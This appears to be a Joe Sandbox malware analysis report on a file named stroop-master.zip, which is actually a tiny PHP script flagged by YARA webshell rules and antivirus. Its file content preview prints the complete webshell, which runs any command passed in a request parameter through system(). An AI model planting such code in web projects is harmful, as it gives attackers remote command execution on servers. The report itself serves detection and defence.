Windows Analysis Report
stroop-master.zip

Overview

General Information

Sample name:stroop-master.zip
Analysis ID:1430585
MD5:5127dd7dec482d81ea1d10be3d7c31d1
SHA1:11c57fe7eee4518cce026962ee42aedfd4b4fc03
SHA256:b31580e55640ffde6967ba13303b4207bb49242dba5168e695a530ce26a032ff
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara signature match

Classification

No configs have been found
Source: stroop-master.zip
Rule: webshell_simple_backdoor
Description: Web Shell - file simple-backdoor.php
Author: Florian Roth
Strings:
  • 0x46:$s0: $cmd = ($_REQUEST['cmd']);
  • 0x9:$s1: if(isset($_REQUEST['cmd'])){
  • 0x6a:$s4: system($cmd);

Source: stroop-master.zip
Rule: WebShell_Simple_PHP_backdoor_by_DK
Description: PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php
Author: Florian Roth
Strings:
  • 0x9:$s6: if(isset($_REQUEST['cmd'])){
  • 0x6a:$s8: system($cmd);
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: stroop-master.zip | ReversingLabs: Detection: 32%

System Summary

Source: stroop-master.zip, type: SAMPLE | Matched rule: Web Shell - file simple-backdoor.php | Author: Florian Roth
Source: stroop-master.zip, type: SAMPLE | Matched rule: PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php | Author: Florian Roth
Source: stroop-master.zip, type: SAMPLE | Matched rule: webshell_simple_backdoor (date = 2014/01/28, author = Florian Roth, description = Web Shell - file simple-backdoor.php, score = f091d1b9274c881f8e41b2f96e6b9936)
Source: stroop-master.zip, type: SAMPLE | Matched rule: WebShell_Simple_PHP_backdoor_by_DK (author = Florian Roth, description = PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php, hash = 03f6215548ed370bec0332199be7c4f68105274e)
Source: classification engine | Classification label: mal56.winZIP@0/0@0/0
Source: stroop-master.zip | ReversingLabs: Detection: 32%
No Mitre Att&ck techniques found
Source: stroop-master.zip | Detection: 32% | Scanner: ReversingLabs | Label: Script-PHP.Backdoor.Yorcirekrikseng | Link: (none)
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1430585
Start date and time:2024-04-23 22:48:08 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 2m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:stroop-master.zip
Detection:MAL
Classification:mal56.winZIP@0/0@0/0
Cookbook Comments:
  • Found application associated with file extension: .zip
  • No process behavior to analyse as no analysis process or sample was found
  • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • VT rate limit hit for: stroop-master.zip
No simulations
No context
No created / dropped files found
File type:PHP script, ASCII text, with CRLF line terminators
Entropy (8bit):4.449015511855094
TrID:
    File name:stroop-master.zip
    File size:170 bytes
    MD5:5127dd7dec482d81ea1d10be3d7c31d1
    SHA1:11c57fe7eee4518cce026962ee42aedfd4b4fc03
    SHA256:b31580e55640ffde6967ba13303b4207bb49242dba5168e695a530ce26a032ff
    SHA512:5996b9d9e8c3a08392297d70de860d60ffdf20a39d8eb3108d0da74e1424a9baa7937abf04638b061e46256911abfec33f1a106c12c7ccf7df499e1f72951533
    SSDEEP:3:ZoUogv9G87MAdFFFBe5VX+Xv/FBiFQ29G87M36mITBMeWFZe5KVDov/TTv:WU9vk1OFB2+X7kk1U1W3z8X
    TLSH:CFC04CA23A4E911562748475424D2814E445414F54209B1574DEA061AF3B0BBA5F89BC
    File Content Preview:<?php....if(isset($_REQUEST['cmd'])){.. echo "<pre>";.. $cmd = ($_REQUEST['cmd']);.. system($cmd);.. echo "</pre>";.. die;..}....?>....
    Icon Hash:1c1c1e4e4ececedc
    No network behavior found
    No statistics
    No system behavior
    No disassembly